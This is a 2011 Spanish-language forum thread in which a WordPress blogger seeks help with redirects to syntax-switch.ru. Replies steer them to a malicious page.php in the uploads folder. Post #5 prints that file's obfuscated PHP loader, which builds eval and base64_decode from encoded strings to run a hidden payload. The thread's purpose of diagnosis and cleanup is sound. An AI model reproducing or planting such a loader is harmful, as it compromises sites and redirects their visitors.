Marca que mi blog distribuye software malicioso de syntax-switch.ru

locmasm · #1 (**permalink**) 19/06/2011, 06:37

Que tal, espero me puedan ayudar.

Recientemente actualice mi blog a la versión 3.1.3 de Wordpress, pero desde hace unos días, al navegar en la parte de administración, de repente me mandaba al sitio syntax-switch.ru.

Haciendo en análisis con la herramienta de google, dice que mi sitio puede ser peligroso porque distribuye información de la pagina syntax-switch.ru

Todo esto empezo despues de actualizarlo, tuve que suspender la pagina.

Alguien que me pueda ayudar?

Gracias a todos

nainona · #2 (**permalink**) 19/06/2011, 08:44

o bien te han colado en el servidor archivos o enlaces que lleven o carguen contenido de ese dominio o sino puede ser que cierto código en tu theme esté directamente enlazado, o algo asi. Hay en el código alguna parte encriptada? si es asi, has comprobado que el problema no esté dentro ?

es que sin mas datos es como jugar a la ruleta

locmasm · #3 (**permalink**) 19/06/2011, 09:15

Cita:

Iniciado por nainona

o bien te han colado en el servidor archivos o enlaces que lleven o carguen contenido de ese dominio o sino puede ser que cierto código en tu theme esté directamente enlazado, o algo asi. Hay en el código alguna parte encriptada? si es asi, has comprobado que el problema no esté dentro ?

es que sin mas datos es como jugar a la ruleta

El problema se ve en el panel de administración, al estar navegando ahi, por ejemplo, entro a ver las estadisticas y me manda a esa pagina, es a veces no todo el tiempo. En cuanto a si hay codigo encriptado, son demasiados archivos.

Nekko · #4 (**permalink**) 21/06/2011, 07:36

Descargá los archivos del theme y revisalos. Hay un plugin llamado Antivirus que te ayuda a ver que no exista código malicioso en el theme.

Luego podés ver si no te subieron algo a tu carpeta /wp-content/uploads/

locmasm · #5 (**permalink**) 25/06/2011, 18:18

Cita:

Iniciado por Nekko

Descargá los archivos del theme y revisalos. Hay un plugin llamado Antivirus que te ayuda a ver que no exista código malicioso en el theme.

Luego podés ver si no te subieron algo a tu carpeta /wp-content/uploads/

Que tal, te comento que en upload encontre un archivo llamado page.php con esto:

Código PHP:

  <?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x2adc;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDdlKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCcybWF4NXlIcEExQ1VJTGtPd05ldTh6dG40b1BRRjY5aFhCMGdZS3ZHRVpETWYvczNWakpsVytpU2RUcWJyUmM3PScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>F]^15ROIxmOIxmOIx+l6p1hFvzVQHygoeXGn+RHe8jyn+rGUaAGA0dYuWROI5rVul2VU0AGA0VYuWROIx2VI5rVCaNOuWrVIx2VI5rE15rVul2VuWrVIaXYul2VI5rVul2VUaNOul2Vul2VIx2ZUaFJQtydLnKAF55jw+z1uH/O6WTK6uBq6HdWQ+mNNg4TPyBaIH6oeSopNzZ5ut43FlLtPYZfzJ/Z8iN8Ft1J8vISOeFf1WyawWNyNY6Ae8ZUu5+ku+mN8KL8zzontyKP4t1goHzvoiBZPv/fQtT3FpyJFSN+6G6d9nEVIuAlLx8iLlXTCJrGCeYZkiogQHRloeXYul2VI5rVul2VCu/K6vyfCaNOul2Vul2Vul2ZkV==avKsPzRlonwEAvNZFSmf4nKhon1JQS1lA0VVCufCon1JQS1hFvzVQS1WPtTGCx2ZkVZYotoZQv8EAYLIe8zkzyRtNz1ue8RkA0V0Fvz/QSNKnSmBoizh6gw0CufCoHzvPtTKCa1Au+L8nWK5A0V0A0YbavNKovKsoeX0zzLynWLmwWByn+Lx8YKwzaAf6p1+oeYbavNKovKsoeX0wWyxe5zh8WLeezm8n+N1u880Ux4VCg4VCg5JCufCoHzvPtTKCa1z8WzhwWyxe5zh8WzezYzeez20UpNJ6t8ZkVZYotoZQv8EAYLmwWByn+Ly8Koy8YKwn+N1u880Ux4VCg4VCg5JCufCoGzs4SNZQidXutyGPtLu6p1ZFpLf4nLEonIE1HyJF0YX9VZZo02EPnLh4n1J4nYE1HyJF0YZApfC1HyJF02RAHyJFvyTni+BFaXGutyGPtLu6p1ZFpLf4nLEonIGUaNBFGAZkVZRotjloemba0NBFGAXOeml6p1ZFpLf4nLEonIE1HyJF0YbaGWCFvzW6n1sAaNBFGAbaGWCoGzs4SNZQidXetTZ6aXZApfCoHzvPtTKCa1xw8LANzR1NyRuw+118yw0UH+YLeBponNAQSLWetwECeTxu5KyuKNhzYze8WKOu0YZkVZYotoZQv8EAYLmwWBynWK5n+Ly8Koy8YKwA0j/ox8ENizWeHRl65KYCaYswWj1N8T8n+oy8KL1uWdsAKRlon1ion1ZFaAZCufCPt4EAto+QvLWPtRsnizdPnLWFJXGFSNJniKJonmf4tLK1JY y muchos mas caracteres...

como ves?

Saludos y gracias por tu apoyo :D

Nekko · #6 (**permalink**) 26/06/2011, 10:49

Uf! Que desgracia! Borrá el archivo y dale permisos 755 a la carpeta uploads y a sus carpetas interiores. Lo complicado ahora es ir adivinando cómo subió eso.

locmasm · #7 (**permalink**) 26/06/2011, 11:02

Cita:

Iniciado por Nekko

Uf! Que desgracia! Borrá el archivo y dale permisos 755 a la carpeta uploads y a sus carpetas interiores. Lo complicado ahora es ir adivinando cómo subió eso.

Que tal.

He decidido por reinstalar el blog, va a ser más rápido en lo que termino de ver que paso, creo que fue cuando actualice el blog e instale unos plugins, tendré más cuidado.

Saludos y gracias a todos por su ayuda. :D